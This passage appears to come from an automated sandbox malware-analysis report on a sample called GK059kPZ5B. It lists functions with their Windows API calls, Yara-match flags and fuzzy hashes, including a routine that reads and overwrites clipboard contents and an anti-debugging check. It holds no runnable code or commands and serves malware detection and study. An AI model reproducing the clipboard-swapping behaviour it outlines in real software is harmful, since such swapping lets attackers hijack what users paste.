                                                            • GetClipboardData.USER32(00000001), ref: 00A51998
                                                            • _strlen.LIBCMT ref: 00A519B4
                                                            • _strlen.LIBCMT ref: 00A519E3
                                                            • _strlen.LIBCMT ref: 00A51B27
                                                            • EmptyClipboard.USER32 ref: 00A51B3D
                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A51B4A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00A51B74
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00A51B7D
                                                            • GlobalFree.KERNEL32(00000000), ref: 00A51B84
                                                            • CloseClipboard.USER32 ref: 00A51BA8
                                                            • Sleep.KERNEL32(000002C7), ref: 00A51BB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                            • String ID: 4#E$i
                                                            • API String ID: 4246938166-2480119546
                                                            • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                            • Instruction ID: f749e1a6551f7aad98ec63b3501f20ead27a615e94fd376bf85d0085fd54cf4f
                                                            • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                            • Instruction Fuzzy Hash: E351E331C00384AAD711DBA4EE46BBD7774FF2A303F045228ED05A6163EBB09A89C759
                                                            Function 00A5237D Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 00A523B8
                                                            • GetClientRect.USER32(?,?), ref: 00A523CD
                                                            • GetDC.USER32(?), ref: 00A523D4
                                                            • CreateSolidBrush.GDI32(00646464), ref: 00A523E7
                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00A52406
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A52427
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A52432
                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 00A5243B
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00A5245F
                                                            • SetBkMode.GDI32(?,00000001), ref: 00A524EA
                                                            • _wcslen.LIBCMT ref: 00A52502
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 1529870607-0
                                                            • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                            • Instruction ID: b62186c11bde3101c421e4c7123f29c9b30ba2cdea1961946380d754e671354f
                                                            • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                            • Instruction Fuzzy Hash: ED71ED72900218AFDB229F64DD85FAEB7BCEB49711F0041A5F609E6155DA70AF84CF14
                                                            Function 0043D698 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                            • Instruction ID: 704f0dc4c1cc7227d133c65a0813f8dc888d98eeea65dda385bca534dc2e7eac
                                                            • Opcode Fuzzy Hash: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                            • Instruction Fuzzy Hash: 37C26D71E096288FDB25DE29DD407EAB7B5EB48304F1451EBD80DE7280E778AE818F45
                                                            Function 0043B78E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                            • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: ACP$OCP
                                                            • API String ID: 2299586839-711371036
                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                            Function 00A8B9F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00A8BD14,?,00000000), ref: 00A8BA8E
                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00A8BD14,?,00000000), ref: 00A8BAB7
                                                            • GetACP.KERNEL32(?,?,00A8BD14,?,00000000), ref: 00A8BACC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: ACP$OCP
                                                            • API String ID: 2299586839-711371036
                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction ID: 69d26ea5532217f391236ded87458565988122062f1fbd3b949f781652e852e5
                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction Fuzzy Hash: 1421B332624105EBD738EF54D901A97F7A6EF54F90B568464E90AD7110F732DE40C374
                                                            Function 0043B962 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                            • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                            • String ID:
                                                            • API String ID: 2287132625-0
                                                            • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                            • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                            • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                            • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                            Function 00A8BBC9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A821C0
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00A8BCD5
                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00A8BD30
                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00A8BD3F
                                                            • GetLocaleInfoW.KERNEL32(?,00001001,00A80A3C,00000040,?,00A80B5C,00000055,00000000,?,?,00000055,00000000), ref: 00A8BD87
                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00A80ABC,00000040), ref: 00A8BDA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                            • String ID:
                                                            • API String ID: 2287132625-0
                                                            • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                            • Instruction ID: 898389581bca1d5318f7273d2a579cfec0e57da57ea81347cc49437f092a2de7
                                                            • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                            • Instruction Fuzzy Hash: 55518FB1A1020AEBDB10FFA5CC45ABEB7B8FF09700F144569E915E7190EB719A04CB71
                                                            Function 0043B02A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                            • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                            • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                            • String ID:
                                                            • API String ID: 2444527052-0
                                                            • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                            • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                            • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                            • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                            Function 00A8B291 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A80A43,?,?,?,?,00A8049A,?,00000004), ref: 00A8B373
                                                            • _wcschr.LIBVCRUNTIME ref: 00A8B403
                                                            • _wcschr.LIBVCRUNTIME ref: 00A8B411
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00A80A43,00000000,00A80B63), ref: 00A8B4B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                            • String ID:
                                                            • API String ID: 2444527052-0
                                                            • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                            • Instruction ID: 633899c124e22556aec8e21f546c3aebbf08c46759d91ab15c7289fa4f9b0130
                                                            • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                            • Instruction Fuzzy Hash: 86610471A10206AAEB24BF75CD42BBB73ACFF04710F14442AF906DB582EB74E94187B5
                                                            Function 004351E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: 11@$GetLocaleInfoEx
                                                            • API String ID: 2299586839-1075713910
                                                            • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                            • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                            • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                            • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                            Function 0043B415 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorInfoLastLocale$_free
                                                            • String ID:
                                                            • API String ID: 2834031935-0
                                                            • Opcode ID: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                            • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                            • Opcode Fuzzy Hash: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                            • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                            Function 0042A3F3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                            • Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
                                                            • Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                            • Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
                                                            Function 00A7A65A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00A5DAFC), ref: 00A7A752
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00A5DAFC), ref: 00A7A75C
                                                            • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00A5DAFC), ref: 00A7A769
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                            • Instruction ID: 29b5190f8c5aefa9b10c2e5c85ceb97b3f2097709ce5880aef11d2c3946aa3c4
                                                            • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                            • Instruction Fuzzy Hash: 4531E67590121CABCB21DF68DD88B8DBBB8BF18710F5081EAE81CA7251E7709F858F45
                                                            Function 0042FE7F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                            • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                            • ExitProcess.KERNEL32 ref: 0042FEB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
                                                            Function 00A800E6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002,00000000), ref: 00A80107
                                                            • TerminateProcess.KERNEL32(00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002,00000000), ref: 00A8010E
                                                            • ExitProcess.KERNEL32 ref: 00A80120
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction ID: fac8ede27b653ae9dcb5637ef02e6ebb8227627187e60d45abcea8e9d1ab5aa8
                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction Fuzzy Hash: 8DE04632000548EBCF01BFA0CE4DE493B69EB06F52B004124F9048B122CB35DE42CB90
                                                            Function 00A5092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 62f54037f6a06eb945785101eb122e187aa1763278cb27456dade5ba50ac39ea
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: 523139B6900609DFDB10CF99C880AAEBBF9FF48325F25404AD841A7315D771EA49CBA4
                                                            Function 00438A12 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /
                                                            • API String ID: 0-2043925204
                                                            • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                            • Instruction ID: a227ec02499bfe1bfd98fe0f4147e6b501038b1cbe903e33c1bef616cbd9e7fb
                                                            • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                            • Instruction Fuzzy Hash: 48412A725003196ECB20EFB9DC49DABB778EB88714F10426EF905D7280EA34AD41CB58
                                                            Function 00A88C79 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /
                                                            • API String ID: 0-2043925204
                                                            • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                            • Instruction ID: f53bb76507e7556771e9f4991c60f24e55593d1db7c4ce1b22e9f0e06827a878
                                                            • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                            • Instruction Fuzzy Hash: 44412972900219AFCB20EFB9DC89EBB77B8EB84710F504269F905D7180EA75DD41CB50
                                                            Function 00A85447 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00A8049A,?,00000004), ref: 00A8549A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: 11@
                                                            • API String ID: 2299586839-1785270423
                                                            • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                            • Instruction ID: 8a65f6d72bdce8e61e00b82eceb1241028e8586c1173717da76a112cbb3b681e
                                                            • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                            • Instruction Fuzzy Hash: 90F02431A80718BFDB01BF70CD02F6E7B21EF05B12F504165FC0667290DA728E20A789
                                                            Function 0042EB00 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                            • Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
                                                            • Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                            • Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
                                                            Function 00A7ED67 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                            • Instruction ID: 5c1d231a849116be24efe51874d35fc87d4e28422700b495b26c726b0df8bdc4
